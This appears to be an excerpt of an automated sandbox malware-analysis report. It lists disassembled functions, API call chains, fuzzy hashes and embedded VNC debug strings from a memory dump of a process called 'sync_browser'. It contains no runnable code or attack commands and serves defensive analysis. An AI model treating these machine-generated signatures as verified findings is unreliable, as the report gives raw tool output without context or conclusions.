                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                    • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                    • API String ID: 3015439405-2946900448
                                                                    • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                    • Instruction ID: af8e5415aa4e9164027937d231339f69da10f23128236969c400c718f02392a8
                                                                    • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                    • Instruction Fuzzy Hash: F921F575A1CB82C5EB04FF24E8841A873A4FB44B48F944035CE6D56368EF78E559D370
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 101574016-0
                                                                    • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                    • Instruction ID: 2572771f71b583036dc1469742915e241cc977508921d3d552ae7da608a41850
                                                                    • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                    • Instruction Fuzzy Hash: F0A18D61E1DB42C2FA2DBB15A900279F294AF84B94F848536DE5D477ADDF3CF441A320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
                                                                    • String ID:
                                                                    • API String ID: 2697342021-0
                                                                    • Opcode ID: de0f7d0db838a6694e556728dce1da0ed6ac73d480ac1435a241c305d3221d84
                                                                    • Instruction ID: 4cbc24f10582338b4cbdcc21d0151a891ead63c0e689638640a13d02861abbfa
                                                                    • Opcode Fuzzy Hash: de0f7d0db838a6694e556728dce1da0ed6ac73d480ac1435a241c305d3221d84
                                                                    • Instruction Fuzzy Hash: 09813B26A0DA81D5EB10FB7094543AD6364EF84BA8F840239DE6D4B7EDCF38E549C324
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                    • String ID:
                                                                    • API String ID: 3219262609-0
                                                                    • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                    • Instruction ID: 3ea0cbae6243fd1196b61b2aebdd76745f57c084bc9a8b8ee9de1f79f8ba0a19
                                                                    • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                    • Instruction Fuzzy Hash: 12317E60E0C652C5FA697A616404379E2A0AF45BD0F984532EE5E47BFEDF2CF8408329
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                    • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                    • API String ID: 173432231-678763868
                                                                    • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                    • Instruction ID: db9dad18ec53ad26e251d05ee509b17a1617c4b7f5902511d089a934c8280203
                                                                    • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                    • Instruction Fuzzy Hash: 5C411C3261DB81E6E648BB20F9402E8B3A8FB44754F904136D6AD037A4DFBCB4B5C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                    • API String ID: 3677997916-356703426
                                                                    • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction ID: fc10de241883f9025e796b662f7a665ce931b1a050e7f65537aa3267d882a7c0
                                                                    • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction Fuzzy Hash: 96413C72A1C643C1EB60BB20F4543AAB3A1FB44788F841031EA4D9677DEF2CE555CB60
                                                                    APIs
                                                                    Strings
                                                                    • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF7400331DE
                                                                    • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF740033246
                                                                    • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF74003319A
                                                                    • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF74003321D
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                    • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                    • API String ID: 803186428-2751095142
                                                                    • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction ID: a538637e634a2be87b2e406385313b9946e67cea8b2e36edb677195c7705754c
                                                                    • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction Fuzzy Hash: AB21386291C586C2E311BB65E4546FA6369FF88B04FC80432CA0E6A379CF7CB545C770
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5A72
                                                                    • malloc.LIBCMT ref: 00007FF7400C5ADB
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B0F
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B36
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B7E
                                                                    • malloc.LIBCMT ref: 00007FF7400C5BDB
                                                                      • Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
                                                                      • Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
                                                                      • Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5C10
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5C50
                                                                    • free.LIBCMT ref: 00007FF7400C5C64
                                                                    • free.LIBCMT ref: 00007FF7400C5C75
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                    • String ID:
                                                                    • API String ID: 1080698880-0
                                                                    • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction ID: 6060d9c2ffee275dc841ef004eaddcbb1859adb30fcef511dd8f7515ea351137
                                                                    • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction Fuzzy Hash: D781C736B0C742C6EB28BF669480169B691FF48BA5F944235EA5D437E8DF3CF5418720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 744660428-3977938048
                                                                    • Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                    • Instruction ID: 83c8e323c194642eae33619538281bcbeac6bcc1fe43bc0ab9efe544e39966cd
                                                                    • Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
                                                                    • Instruction Fuzzy Hash: 58D17F22A0C6D1C5E751BB35C4487EDABA1EB85B88F994139CA4C0B7B9CF79E845C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2523754900-3977938048
                                                                    • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction ID: cd43859bf3b9b465c6c995e31249f31938a5c95bdc686740604c4cd24c8d41f3
                                                                    • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction Fuzzy Hash: 25B1CF22A0C691C5E750FB25C4587FEABA1EB85B84F994039DA4C477B9CF38F845C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 744660428-3977938048
                                                                    • Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                    • Instruction ID: 9d5fc086b135b1673e3a02a6c5b3a4b939cbfc16935846d6f6eadb4db32d84e3
                                                                    • Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
                                                                    • Instruction Fuzzy Hash: E9B1BF22A0C691C5E751BB35C4587FEABA1EB85B84F994039DA4C477B9CF39F844C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                    • String ID: ConsoleWindowClass$tty
                                                                    • API String ID: 490048385-1921057836
                                                                    • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction ID: fae68a484c02576e1b89e05d312a94c1875bbd426d9915c64e01c5972952759b
                                                                    • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction Fuzzy Hash: 26415E36708785CADB24AB26E580669B7A0FB88B84F844035DF8E53B68DF3CF445CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileInfoLastSizeVersion
                                                                    • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                    • API String ID: 752140088-134519983
